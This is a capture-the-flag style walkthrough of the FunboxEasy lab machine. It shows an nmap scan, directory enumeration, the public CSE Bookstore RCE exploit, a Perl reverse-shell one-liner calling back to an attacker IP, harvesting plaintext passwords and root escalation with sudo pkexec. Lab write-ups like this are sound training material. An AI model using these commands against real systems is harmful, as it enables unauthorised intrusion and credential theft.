# FunboxEasy

## Nmap

```
nmap 192.168.178.111 -p- -sS -sV

Host is up (0.097s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx?
```

Checking out port 80 we have the default install page for Apache 2.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2f4cfe8165a34dc58fd4d1fd30ca6abaa18adef%2Fimage.png?alt=media)

Checking the source on this page reveals no interesting information. From here I executed dirsearch.py against the target machine.

```
sudo python3 dirsearch.py -u http://192.168.178.111/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d4212d20354a7875d7790fada5625e93f4ee9738%2Fimage.png?alt=media)

Checking the directory /store we are presented a web page for 'CSE bookstore'.

![/store](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-044b74e2097ad3542308606c2eed6f4b33707134%2Fimage.png?alt=media)

Researching exploits on Google for 'CSE bookstore' we are presented with an exploit for Unauthenticated RCE. The exploit PoC has been linked below.

{% embed url="<https://www.exploit-db.com/exploits/47887>" %}

After downloading the PoC I executed it with the following command:

```
python3 47887.py http://192.168.178.111/store/
```

When prompted to launch a shell hit 'y'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3131b32f568d30fdbe4d5ed911135b7a65d3acb8%2Fimage.png?alt=media)

This shell stops us from properly navigating the target machine and will return us back to the current working directory when the command has finished executing. As such I checked what binary's are installed on the target machine so we can spawn a shell where we can navigate the target properly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0b038c25224a8e5cbbfe984a1bb3c4c50015da7f%2Fimage.png?alt=media)

As per above `perl` is installed on the system. From here I started a `netcat` listener on my attacking machine.

```
sudo nc -lvp 80
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79d5c4c23f45c15f747f7f2cd7e84e90e98eea6a%2Fimage.png?alt=media)

I then executed the following command to gain a `perl` reverse shell.

```
perl -e 'use Socket;$i="192.168.49.178";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f9fbda77862ffd962aaee4c28b37eb3ae6b3ebf%2Fimage.png?alt=media)

Moving into the home directory and then into the user tony's home directory we have passwords.txt. Reading the contents of this text file shows the following information:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c787f465db111b59e63d0681103ddffd0ceb4143%2Fimage.png?alt=media)

```
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
```

I then able to login with the `SSH` password for the user tony.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e6c840bc18356d79f100d12387f750f5e1abb96e%2Fimage.png?alt=media)

Checking `sudo -l` for `sudo` permissions we come into a multitude of entries.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-df4b3d43e59f79d1a9f19b6e636659425fc6c50e%2Fimage.png?alt=media)

As we can execute `sudo` as the user root without supplying a password here I will use `pkexec` to spawn a bash shell as root.

```
sudo pkexec /bin/sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f31ee83f0821fa422879f2e4b2535430e58ebda5%2Fimage.png?alt=media)